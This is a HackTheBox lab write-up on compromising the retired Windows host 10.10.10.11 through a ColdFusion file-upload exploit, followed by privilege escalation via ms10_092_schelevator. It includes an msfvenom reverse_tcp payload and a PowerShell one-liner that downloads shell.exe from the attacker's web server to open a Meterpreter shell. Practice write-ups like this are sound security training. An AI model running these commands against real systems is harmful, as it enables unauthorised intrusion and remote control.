This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.
Machine IP: 10.10.10.11
I run a quick port scan to identify the open ports:
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 22:21 EDT Nmap scan report for 10.10.10.11 Host is up (0.018s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 135/tcp open msrpc 8500/tcp open fmtp 49154/tcp open unknown
I then interrogate the three open ports:
nmap -A -sC -sV -Pn -p135,8500,49154 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 22:23 EDT Nmap scan report for 10.10.10.11 Host is up (0.013s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
THe 8500 port defies identification. Navigating to it in my browser, I see it is a web server.
I bust out gobuster. It times out trying to query the server. By manually navigating to a few test paths and counting seconds, I see the issue. The server waits 25 seconds before responding to any web request.
I extend gobuster’s HTTP timeout to 35 seconds with the flag
It takes a while for the brute force to run, but I eventually make my way to this page:
Where I find a Coldfusion web server.
Searching for vulnerabilities on exploit-db with
searchsploit coldfusion, I find the following:
Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt
Ah, and it has a matching Metasploit module:
This module will not work out of the box, however, as its default timeout is 5 seconds.
The module file is located at
You want to find the
send_request_raw methods and change the
5 at the end of their function declarations to
30, to increase their timeouts from 5 seconds to 30 seconds.
From there, you can execute this exploit to obtain a user shell and the accompanying user flag.
Let’s take this user shell and upgrade it to a Meterpreter shell so that we can run Metasploit’s local privilege suggester for privilege escalation options.
We create a payload with
msfvenom and start a local web server:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.29 lport=4645 -f exe > shell.exe sudo python3 -m http.server
Then, in our user shell on the target, we can execute this powershell one-liner to download the file:
powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.29:8000/shell.exe', 'fun.exe')"
From there we start a Meterpreter handler on port
4645 and run the
fun.exe executable on the target. Our meterpreter user shell connects.
Now run run
msf5 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.11 - Collecting local exploits for x64/windows... [*] 10.10.10.11 - 15 exploit checks are being tried... [+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable. [+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable. [+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable. [+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [*] Post module execution completed
Our user is not in the Administrators group so we cannot use the first two exploits.
The third exploit,
exploit/windows/local/ms10_092_schelevator, is successful and we get a root shell. From here we can grab our root flag.